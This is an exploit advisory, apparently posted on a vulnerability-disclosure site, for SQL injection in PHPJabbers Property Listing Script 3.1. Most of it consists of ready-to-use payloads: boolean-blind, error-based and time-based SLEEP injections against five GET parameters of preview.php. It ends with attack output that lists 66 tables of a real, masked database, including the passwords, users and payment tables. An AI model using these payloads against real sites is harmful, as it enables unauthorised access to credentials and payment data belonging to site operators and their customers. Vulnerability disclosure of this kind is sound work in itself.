PHPJabbers Property Listing Script 3.1 SQL Injection

2023.01.30
Credit: CraCkEr
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ││ C r a C k E r ┌┘ ┌┘ T H E C R A C K O F E T E R N A L M I G H T ││ └───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐ ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ [ Vulnerability ] ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ : Author : CraCkEr : │ Website : PHPJabbers.com │ │ Vendor : PHPJabbers │ │ Software : PHPJabbers Property Listing Script 3.1 │ │ Vuln Type: SQL Injection │ │ Impact : Database Access │ │ │ │────────────────────────────────────────────────────────────────────────────────────────│ │ ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ : : │ Release Notes: │ │ ═════════════ │ │ │ │ SQL injection attacks can allow unauthorized access to sensitive data, modification of │ │ data and crash the application or make it unavailable, leading to lost revenue and │ │ damage to a company's reputation. │ │ │ ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ Greets: The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL CryptoJob (Twitter) twitter.com/CryptozJob ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ © CraCkEr 2023 ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ Path: preview.php /preview.php?controller=pjListings&action=pjActionProperties&listing_search=1&for=&keyword=pent&location=&type_id=3&specials=premium&feature_id=[SQLI]&min_bedrooms=[SQLI]&max_bedrooms=[SQLI]&min_bathrooms=[SQLI]&max_bathrooms=[SQLI]&min_floor_area=11&max_floor_area=33 GET parameter 'feature_id' is vulnerable to SQLI --- Parameter: feature_id (GET) Type: boolean-based blind Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: controller=pjListings&action=pjActionProperties&listing_search=1&for=&keyword=pent&location=&type_id=3&specials=premium&feature_id=1' RLIKE (SELECT (CASE WHEN (2062=2062) THEN 1 ELSE 0x28 END)) AND 'NbjG'='NbjG&min_bedrooms=1&max_bedrooms=2&min_bathrooms=2&max_bathrooms=3&min_floor_area=11&max_floor_area=33 Type: error-based Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET) Payload: controller=pjListings&action=pjActionProperties&listing_search=1&for=&keyword=pent&location=&type_id=3&specials=premium&feature_id=1' AND GTID_SUBSET(CONCAT(0x717a706b71,(SELECT (ELT(2733=2733,1))),0x716b707171),2733) AND 'iWla'='iWla&min_bedrooms=1&max_bedrooms=2&min_bathrooms=2&max_bathrooms=3&min_floor_area=11&max_floor_area=33 Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: controller=pjListings&action=pjActionProperties&listing_search=1&for=&keyword=pent&location=&type_id=3&specials=premium&feature_id=1' AND (SELECT 3509 FROM (SELECT(SLEEP(5)))pnEw) AND 'UOAT'='UOAT&min_bedrooms=1&max_bedrooms=2&min_bathrooms=2&max_bathrooms=3&min_floor_area=11&max_floor_area=33 --- GET parameter 'min_bedrooms' is vulnerable to SQLI --- Parameter: min_bedrooms (GET) Type: boolean-based blind Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: controller=pjListings&action=pjActionProperties&listing_search=1&for=&keyword=pent&location=&type_id=3&specials=premium&feature_id=1&min_bedrooms=1) RLIKE (SELECT (CASE WHEN (7879=7879) THEN 1 ELSE 0x28 END))-- HIzI&max_bedrooms=2&min_bathrooms=2&max_bathrooms=3&min_floor_area=11&max_floor_area=33 Type: error-based Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET) Payload: controller=pjListings&action=pjActionProperties&listing_search=1&for=&keyword=pent&location=&type_id=3&specials=premium&feature_id=1&min_bedrooms=1) AND GTID_SUBSET(CONCAT(0x717a706b71,(SELECT (ELT(2095=2095,1))),0x716b707171),2095)-- bfcY&max_bedrooms=2&min_bathrooms=2&max_bathrooms=3&min_floor_area=11&max_floor_area=33 Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: controller=pjListings&action=pjActionProperties&listing_search=1&for=&keyword=pent&location=&type_id=3&specials=premium&feature_id=1&min_bedrooms=1) AND (SELECT 9649 FROM (SELECT(SLEEP(5)))cOvl)-- zdSI&max_bedrooms=2&min_bathrooms=2&max_bathrooms=3&min_floor_area=11&max_floor_area=33 --- GET parameter 'max_bedrooms' is vulnerable to SQLI --- Parameter: max_bedrooms (GET) Type: boolean-based blind Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: controller=pjListings&action=pjActionProperties&listing_search=1&for=&keyword=pent&location=&type_id=3&specials=premium&feature_id=1&min_bedrooms=1&max_bedrooms=2) RLIKE (SELECT (CASE WHEN (6630=6630) THEN 2 ELSE 0x28 END))-- gEsM&min_bathrooms=2&max_bathrooms=3&min_floor_area=11&max_floor_area=33 Type: error-based Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET) Payload: controller=pjListings&action=pjActionProperties&listing_search=1&for=&keyword=pent&location=&type_id=3&specials=premium&feature_id=1&min_bedrooms=1&max_bedrooms=2) AND GTID_SUBSET(CONCAT(0x717a706b71,(SELECT (ELT(9738=9738,1))),0x716b707171),9738)-- jXwM&min_bathrooms=2&max_bathrooms=3&min_floor_area=11&max_floor_area=33 Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: controller=pjListings&action=pjActionProperties&listing_search=1&for=&keyword=pent&location=&type_id=3&specials=premium&feature_id=1&min_bedrooms=1&max_bedrooms=2) AND (SELECT 3446 FROM (SELECT(SLEEP(5)))VCFX)-- cQSs&min_bathrooms=2&max_bathrooms=3&min_floor_area=11&max_floor_area=33 --- GET parameter 'min_bathrooms' is vulnerable to SQLI --- Parameter: min_bathrooms (GET) Type: boolean-based blind Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: controller=pjListings&action=pjActionProperties&listing_search=1&for=&keyword=pent&location=&type_id=3&specials=premium&feature_id=1&min_bedrooms=1&max_bedrooms=2&min_bathrooms=2) RLIKE (SELECT (CASE WHEN (2227=2227) THEN 2 ELSE 0x28 END))-- lmwd&max_bathrooms=3&min_floor_area=11&max_floor_area=33 Type: error-based Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET) Payload: controller=pjListings&action=pjActionProperties&listing_search=1&for=&keyword=pent&location=&type_id=3&specials=premium&feature_id=1&min_bedrooms=1&max_bedrooms=2&min_bathrooms=2) AND GTID_SUBSET(CONCAT(0x717a706b71,(SELECT (ELT(4352=4352,1))),0x716b707171),4352)-- OidJ&max_bathrooms=3&min_floor_area=11&max_floor_area=33 Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: controller=pjListings&action=pjActionProperties&listing_search=1&for=&keyword=pent&location=&type_id=3&specials=premium&feature_id=1&min_bedrooms=1&max_bedrooms=2&min_bathrooms=2) AND (SELECT 6082 FROM (SELECT(SLEEP(5)))PGLl)-- mBCY&max_bathrooms=3&min_floor_area=11&max_floor_area=33 --- GET parameter 'max_bathrooms' is vulnerable to SQLI --- Parameter: max_bathrooms (GET) Type: boolean-based blind Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: controller=pjListings&action=pjActionProperties&listing_search=1&for=&keyword=pent&location=&type_id=3&specials=premium&feature_id=1&min_bedrooms=1&max_bedrooms=2&min_bathrooms=2&max_bathrooms=3) RLIKE (SELECT (CASE WHEN (9932=9932) THEN 3 ELSE 0x28 END))-- GPVf&min_floor_area=11&max_floor_area=33 Type: error-based Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET) Payload: controller=pjListings&action=pjActionProperties&listing_search=1&for=&keyword=pent&location=&type_id=3&specials=premium&feature_id=1&min_bedrooms=1&max_bedrooms=2&min_bathrooms=2&max_bathrooms=3) AND GTID_SUBSET(CONCAT(0x717a706b71,(SELECT (ELT(3098=3098,1))),0x716b707171),3098)-- hFHq&min_floor_area=11&max_floor_area=33 Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: controller=pjListings&action=pjActionProperties&listing_search=1&for=&keyword=pent&location=&type_id=3&specials=premium&feature_id=1&min_bedrooms=1&max_bedrooms=2&min_bathrooms=2&max_bathrooms=3) AND (SELECT 4637 FROM (SELECT(SLEEP(5)))iqxa)-- IvPE&min_floor_area=11&max_floor_area=33 --- [+] Starting the Attack fetching tables for database: '********_****_***' Database: ********_****_*** [66 tables] +------------------------------------------+ | property_listing_features | | property_listing_fields | | property_listing_multi_lang | | property_listing_options | | property_listing_passwords | | property_listing_payments | | property_listing_periods | | property_listing_plugin_country | | property_listing_plugin_galleries_set | | property_listing_plugin_gallery | | property_listing_plugin_locale_languages | | property_listing_plugin_locale | | property_listing_plugin_log_config | | property_listing_plugin_log | | property_listing_plugin_one_admin | | property_listing_plugin_paypal | | property_listing_plugin_sms | | property_listing_properties_features | | property_listing_properties | | property_listing_roles | | property_listing_types | | property_listing_users | | property_listing_features | | property_listing_fields | | property_listing_multi_lang | | property_listing_options | | property_listing_passwords | | property_listing_payments | | property_listing_periods | | property_listing_plugin_country | | property_listing_plugin_galleries_set | | property_listing_plugin_gallery | | property_listing_plugin_locale_languages | | property_listing_plugin_locale | | property_listing_plugin_log_config | | property_listing_plugin_log | | property_listing_plugin_one_admin | | property_listing_plugin_paypal | | property_listing_plugin_sms | | property_listing_properties_features | | property_listing_properties | | property_listing_roles | | property_listing_types | | property_listing_users | | property_listing_features | | property_listing_fields | | property_listing_multi_lang | | property_listing_options | | property_listing_passwords | | property_listing_payments | | property_listing_periods | | property_listing_plugin_country | | property_listing_plugin_galleries_set | | property_listing_plugin_gallery | | property_listing_plugin_locale | | property_listing_plugin_locale_languages | | property_listing_plugin_log | | property_listing_plugin_log_config | | property_listing_plugin_one_admin | | property_listing_plugin_paypal | | property_listing_plugin_sms | | property_listing_properties | | property_listing_properties_features | | property_listing_roles | | property_listing_types | | property_listing_users | +------------------------------------------+ [-] Done


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top